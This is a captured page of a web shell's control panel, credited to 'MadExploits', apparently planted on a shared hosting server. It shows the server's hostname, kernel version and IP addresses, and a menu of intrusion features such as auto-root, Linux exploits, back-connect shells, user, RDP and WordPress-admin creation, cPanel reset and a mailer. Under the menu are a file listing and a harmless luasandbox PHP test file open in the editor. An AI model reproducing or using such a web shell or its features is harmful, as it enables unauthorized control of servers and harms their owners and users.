Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.139.103.57
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php82-pecl-luasandbox_4.1.2-2.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
LuaSandboxFunction_construct.p...
253
B
-rw-r--r--
array-key-conversion.phpt
3.11
KB
-rw-r--r--
call.phpt
5.1
KB
-rw-r--r--
callback_exception.phpt
392
B
-rw-r--r--
datatypes-unsupported.phpt
2.78
KB
-rw-r--r--
datatypes.phpt
2.43
KB
-rw-r--r--
dump_loadBinary_call.phpt
393
B
-rw-r--r--
errors-at-call-boundaries.phpt
1.98
KB
-rw-r--r--
extending-LuaSandbox.phpt
845
B
-rw-r--r--
ipairs.phpt
1.53
KB
-rw-r--r--
loadString.phpt
334
B
-rw-r--r--
lua_catches_php_exception.phpt
1.34
KB
-rw-r--r--
pairs.phpt
3.31
KB
-rw-r--r--
pcall.phpt
1.27
KB
-rw-r--r--
profiler-sorting.phpt
1.18
KB
-rw-r--r--
profiler.phpt
1.54
KB
-rw-r--r--
reentrant.phpt
1.1
KB
-rw-r--r--
xpcall.phpt
2.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dump_loadBinary_call.phpt
--TEST-- dump -> loadBinary -> call --FILE-- <?php var_dump( $sandbox = new LuaSandbox ); var_dump( $f = $sandbox->loadString( 'return 1' ) ); $dump = $f->dump(); var_dump( $restore = $sandbox->loadBinary( $dump ) ); var_dump( $restore->call() ); --EXPECT-- object(LuaSandbox)#1 (0) { } object(LuaSandboxFunction)#2 (0) { } object(LuaSandboxFunction)#3 (0) { } array(1) { [0]=> int(1) }
Close